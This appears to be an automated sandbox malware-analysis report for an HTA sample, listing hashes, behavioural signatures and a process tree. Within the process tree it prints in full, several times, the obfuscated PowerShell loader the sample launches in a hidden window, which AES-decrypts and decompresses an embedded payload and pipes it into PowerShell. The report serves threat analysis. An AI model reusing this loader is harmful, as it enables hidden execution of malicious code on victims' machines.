Analysis
-
max time kernel
123s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14-10-2023 00:28
Static task
static1
Behavioral task
behavioral1
Sample
deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156_JC.hta
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156_JC.hta
Resource
win10v2004-20230915-en
General
-
Target
deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156_JC.hta
-
Size
1.3MB
-
MD5
1d79ae342a84393e3b52a239e48e25db
-
SHA1
4aaa0e4a1f56df8c163ed051e4ba140984748a31
-
SHA256
deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156
-
SHA512
340407374ef1ad16da7374f123b8f7dd0c5aedb24bce2d36a904d4385328b7b6a31729a8409d67795baff9a3832d3a48712c8e6cc32b6db8117371d227cc7f4a
-
SSDEEP
6144:tkDlvmcFdKukb08m+dQx/EIAJyZffYISZ/:vZ/
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2120 powershell.exe 2120 powershell.exe 2120 powershell.exe 2484 powershell.exe 2504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2120 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeDebugPrivilege 2504 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2252 wrote to memory of 2120 2252 mshta.exe 27 PID 2252 wrote to memory of 2120 2252 mshta.exe 27 PID 2252 wrote to memory of 2120 2252 mshta.exe 27 PID 2252 wrote to memory of 2120 2252 mshta.exe 27 PID 2120 wrote to memory of 2628 2120 powershell.exe 30 PID 2120 wrote to memory of 2628 2120 powershell.exe 30 PID 2120 wrote to memory of 2628 2120 powershell.exe 30 PID 2120 wrote to memory of 2628 2120 powershell.exe 30 PID 2628 wrote to memory of 2484 2628 cmd.exe 32 PID 2628 wrote to memory of 2484 2628 cmd.exe 32 PID 2628 wrote to memory of 2484 2628 cmd.exe 32 PID 2628 wrote to memory of 2484 2628 cmd.exe 32 PID 2628 wrote to memory of 2504 2628 cmd.exe 33 PID 2628 wrote to memory of 2504 2628 cmd.exe 33 PID 2628 wrote to memory of 2504 2628 cmd.exe 33 PID 2628 wrote to memory of 2504 2628 cmd.exe 33
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156_JC.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $pBuoGDXT = 'AAAAAAAAAAAAAAAAAAAAAFy+EMbUMvMJo3vKX7LrHvmDj13fXzmwqXCpukEhyyUI3AMx77gvYbusHZ4hxYlVU7b2/Sd3M5o1gKIOs0WJ24rr1oGt1QjcJR0u3NktwuPs2/VpIzAn7139POKxJ6lBmvrjQSF6zJ0kduiPEdQIB8i/i0u99pH87kDKTAUlREAS8BTrdRka542T95/9Gc6656BNxpYEQf2QAxRYHSbxSWiQGFK/YgGoiSLE6ty0FG78OvKBAAdeDjCUaODS+cojLRmTGE8S1vEQlGREtiezmOWAS076dRIe2wCDC6NnlS/7gAR8+WmK7vFy05XyNOIdjsGJuNZeBO8FY5QWTZl+qEe8banPuit20enjY3ZXILJcy5NWBdrCjwW0ilqZuFyCKIVfr1+LweLD2ZSc7WDzGEK51pJkN2zJ9INVzDTBBpyNHAXP8pmQMB10Ly1p9MqLn3C3AnOHR6npswIMbfNnknsEPZ8RQMHDxyU+VxDNPmgbHlq3GKZ3cMUy6SNCK+TFshHkJmcmQ+Q1EmqIlO3pyqmtQlPn+sdL2DxeeTXFsXT6KgmEGXkW+0lgjJcWTMQW/tIrqVZOTWeavhOP8vqmMc3F6A/uNdgHwqWcnzwMWfCHdDpIiWS1i9fQiw16OkgrkpSVeDhzPdFBbt5+l+3AfgJXksblGAVuS2PLOWD8o/YYVL/KNhBRI0aKzyMs0r8/wWn0Pxew7PIKYt+m3JiB2OGNyfvlJ1f/hJ/ODb/VedoCvPN3hVHqJQk4eARpM6wjuDOQV2S2duJN9FtlEA5KQKKIwD7GsKfwRvxU4c9S+tk+M+kJ2oLGiaRqCTJsF4XAbbNI3qeUAbgqMvwo1iS95AoyJRAsuFMJpBbt5+hQIUNqWE9gH4FReZF3uRkJJ7/CWRpct8KisIa1rSX91r0l9pgvmJ98cu59P35V6Sipyjy3+GqSuxg7+/XLmefCBORQYye0zBk6QVmZduvldKPCGXfRt/6ng+yOpW9UIIRoH2SEwxt6n8bLKswRP7F4pBwrVxNEF60lXUid6jKg44E4gSzSKl1ayUh/olX4RPMdL7KBy8WKWbF2JQzZHkbhzarzH/eNfZn2Np5HjNWSkuCQIh0=';$Scxrc = 'dUdremhBRVpqWmdLT3NxRXlXanFtcHpGZWdRRVdoRmo=';$dLPDYZ = New-Object 'System.Security.Cryptography.AesManaged';$dLPDYZ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dLPDYZ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dLPDYZ.BlockSize = 128;$dLPDYZ.KeySize = 256;$dLPDYZ.Key = [System.Convert]::FromBase64String($Scxrc);$yEsDu = [System.Convert]::FromBase64String($pBuoGDXT);$qyDTpjIY = $yEsDu[0..15];$dLPDYZ.IV = $qyDTpjIY;$uTpbZaIXi = $dLPDYZ.CreateDecryptor();$tpRGoQYrw = $uTpbZaIXi.TransformFinalBlock($yEsDu, 16, $yEsDu.Length - 16);$dLPDYZ.Dispose();$wmhF = New-Object System.IO.MemoryStream( , $tpRGoQYrw );$EyecAc = New-Object System.IO.MemoryStream;$sVIbzvgSN = New-Object System.IO.Compression.GzipStream $wmhF, ([IO.Compression.CompressionMode]::Decompress);$sVIbzvgSN.CopyTo( $EyecAc );$sVIbzvgSN.Close();$wmhF.Close();[byte[]] $AXQUFdWN = $EyecAc.ToArray();$GTChecsr = [System.Text.Encoding]::UTF8.GetString($AXQUFdWN);$GTChecsr | powershell - }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $pBuoGDXT = 'AAAAAAAAAAAAAAAAAAAAAFy+EMbUMvMJo3vKX7LrHvmDj13fXzmwqXCpukEhyyUI3AMx77gvYbusHZ4hxYlVU7b2/Sd3M5o1gKIOs0WJ24rr1oGt1QjcJR0u3NktwuPs2/VpIzAn7139POKxJ6lBmvrjQSF6zJ0kduiPEdQIB8i/i0u99pH87kDKTAUlREAS8BTrdRka542T95/9Gc6656BNxpYEQf2QAxRYHSbxSWiQGFK/YgGoiSLE6ty0FG78OvKBAAdeDjCUaODS+cojLRmTGE8S1vEQlGREtiezmOWAS076dRIe2wCDC6NnlS/7gAR8+WmK7vFy05XyNOIdjsGJuNZeBO8FY5QWTZl+qEe8banPuit20enjY3ZXILJcy5NWBdrCjwW0ilqZuFyCKIVfr1+LweLD2ZSc7WDzGEK51pJkN2zJ9INVzDTBBpyNHAXP8pmQMB10Ly1p9MqLn3C3AnOHR6npswIMbfNnknsEPZ8RQMHDxyU+VxDNPmgbHlq3GKZ3cMUy6SNCK+TFshHkJmcmQ+Q1EmqIlO3pyqmtQlPn+sdL2DxeeTXFsXT6KgmEGXkW+0lgjJcWTMQW/tIrqVZOTWeavhOP8vqmMc3F6A/uNdgHwqWcnzwMWfCHdDpIiWS1i9fQiw16OkgrkpSVeDhzPdFBbt5+l+3AfgJXksblGAVuS2PLOWD8o/YYVL/KNhBRI0aKzyMs0r8/wWn0Pxew7PIKYt+m3JiB2OGNyfvlJ1f/hJ/ODb/VedoCvPN3hVHqJQk4eARpM6wjuDOQV2S2duJN9FtlEA5KQKKIwD7GsKfwRvxU4c9S+tk+M+kJ2oLGiaRqCTJsF4XAbbNI3qeUAbgqMvwo1iS95AoyJRAsuFMJpBbt5+hQIUNqWE9gH4FReZF3uRkJJ7/CWRpct8KisIa1rSX91r0l9pgvmJ98cu59P35V6Sipyjy3+GqSuxg7+/XLmefCBORQYye0zBk6QVmZduvldKPCGXfRt/6ng+yOpW9UIIRoH2SEwxt6n8bLKswRP7F4pBwrVxNEF60lXUid6jKg44E4gSzSKl1ayUh/olX4RPMdL7KBy8WKWbF2JQzZHkbhzarzH/eNfZn2Np5HjNWSkuCQIh0=';$Scxrc = 'dUdremhBRVpqWmdLT3NxRXlXanFtcHpGZWdRRVdoRmo=';$dLPDYZ = New-Object 'System.Security.Cryptography.AesManaged';$dLPDYZ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dLPDYZ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dLPDYZ.BlockSize = 128;$dLPDYZ.KeySize = 256;$dLPDYZ.Key = [System.Convert]::FromBase64String($Scxrc);$yEsDu = [System.Convert]::FromBase64String($pBuoGDXT);$qyDTpjIY = $yEsDu[0..15];$dLPDYZ.IV = $qyDTpjIY;$uTpbZaIXi = $dLPDYZ.CreateDecryptor();$tpRGoQYrw = $uTpbZaIXi.TransformFinalBlock($yEsDu, 16, $yEsDu.Length - 16);$dLPDYZ.Dispose();$wmhF = New-Object System.IO.MemoryStream( , $tpRGoQYrw );$EyecAc = New-Object System.IO.MemoryStream;$sVIbzvgSN = New-Object System.IO.Compression.GzipStream $wmhF, ([IO.Compression.CompressionMode]::Decompress);$sVIbzvgSN.CopyTo( $EyecAc );$sVIbzvgSN.Close();$wmhF.Close();[byte[]] $AXQUFdWN = $EyecAc.ToArray();$GTChecsr = [System.Text.Encoding]::UTF8.GetString($AXQUFdWN);$GTChecsr | powershell -3⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $pBuoGDXT = 'AAAAAAAAAAAAAAAAAAAAAFy+EMbUMvMJo3vKX7LrHvmDj13fXzmwqXCpukEhyyUI3AMx77gvYbusHZ4hxYlVU7b2/Sd3M5o1gKIOs0WJ24rr1oGt1QjcJR0u3NktwuPs2/VpIzAn7139POKxJ6lBmvrjQSF6zJ0kduiPEdQIB8i/i0u99pH87kDKTAUlREAS8BTrdRka542T95/9Gc6656BNxpYEQf2QAxRYHSbxSWiQGFK/YgGoiSLE6ty0FG78OvKBAAdeDjCUaODS+cojLRmTGE8S1vEQlGREtiezmOWAS076dRIe2wCDC6NnlS/7gAR8+WmK7vFy05XyNOIdjsGJuNZeBO8FY5QWTZl+qEe8banPuit20enjY3ZXILJcy5NWBdrCjwW0ilqZuFyCKIVfr1+LweLD2ZSc7WDzGEK51pJkN2zJ9INVzDTBBpyNHAXP8pmQMB10Ly1p9MqLn3C3AnOHR6npswIMbfNnknsEPZ8RQMHDxyU+VxDNPmgbHlq3GKZ3cMUy6SNCK+TFshHkJmcmQ+Q1EmqIlO3pyqmtQlPn+sdL2DxeeTXFsXT6KgmEGXkW+0lgjJcWTMQW/tIrqVZOTWeavhOP8vqmMc3F6A/uNdgHwqWcnzwMWfCHdDpIiWS1i9fQiw16OkgrkpSVeDhzPdFBbt5+l+3AfgJXksblGAVuS2PLOWD8o/YYVL/KNhBRI0aKzyMs0r8/wWn0Pxew7PIKYt+m3JiB2OGNyfvlJ1f/hJ/ODb/VedoCvPN3hVHqJQk4eARpM6wjuDOQV2S2duJN9FtlEA5KQKKIwD7GsKfwRvxU4c9S+tk+M+kJ2oLGiaRqCTJsF4XAbbNI3qeUAbgqMvwo1iS95AoyJRAsuFMJpBbt5+hQIUNqWE9gH4FReZF3uRkJJ7/CWRpct8KisIa1rSX91r0l9pgvmJ98cu59P35V6Sipyjy3+GqSuxg7+/XLmefCBORQYye0zBk6QVmZduvldKPCGXfRt/6ng+yOpW9UIIRoH2SEwxt6n8bLKswRP7F4pBwrVxNEF60lXUid6jKg44E4gSzSKl1ayUh/olX4RPMdL7KBy8WKWbF2JQzZHkbhzarzH/eNfZn2Np5HjNWSkuCQIh0=';$Scxrc = 'dUdremhBRVpqWmdLT3NxRXlXanFtcHpGZWdRRVdoRmo=';$dLPDYZ = New-Object 'System.Security.Cryptography.AesManaged';$dLPDYZ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dLPDYZ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dLPDYZ.BlockSize = 128;$dLPDYZ.KeySize = 256;$dLPDYZ.Key = [System.Convert]::FromBase64String($Scxrc);$yEsDu = [System.Convert]::FromBase64String($pBuoGDXT);$qyDTpjIY = $yEsDu[0..15];$dLPDYZ.IV = $qyDTpjIY;$uTpbZaIXi = $dLPDYZ.CreateDecryptor();$tpRGoQYrw = $uTpbZaIXi.TransformFinalBlock($yEsDu, 16, $yEsDu.Length - 16);$dLPDYZ.Dispose();$wmhF = New-Object System.IO.MemoryStream( , $tpRGoQYrw );$EyecAc = New-Object System.IO.MemoryStream;$sVIbzvgSN = New-Object System.IO.Compression.GzipStream $wmhF, ([IO.Compression.CompressionMode]::Decompress);$sVIbzvgSN.CopyTo( $EyecAc );$sVIbzvgSN.Close();$wmhF.Close();[byte[]] $AXQUFdWN = $EyecAc.ToArray();$GTChecsr = [System.Text.Encoding]::UTF8.GetString($AXQUFdWN);$GTChecsr4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AS285YZFODVTH30UJLIT.temp
Filesize7KB
MD5dad72959f528c14140397f205f9ee04b
SHA17ea96b1ca173f60c1c5311023fa1cd1947f98446
SHA2565b83777337e49ecca1994e36a9011a9305c35cc656113dbbe3284e25689d7c68
SHA5128595925419521b18332fce2200f64d5e86514615b2dce5ead4bf9a89699b070ff5aff4c9f4e20cec2c13ff4b1c8cb854acbadc9b848e159a84ebef38f389b9d6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5dad72959f528c14140397f205f9ee04b
SHA17ea96b1ca173f60c1c5311023fa1cd1947f98446
SHA2565b83777337e49ecca1994e36a9011a9305c35cc656113dbbe3284e25689d7c68
SHA5128595925419521b18332fce2200f64d5e86514615b2dce5ead4bf9a89699b070ff5aff4c9f4e20cec2c13ff4b1c8cb854acbadc9b848e159a84ebef38f389b9d6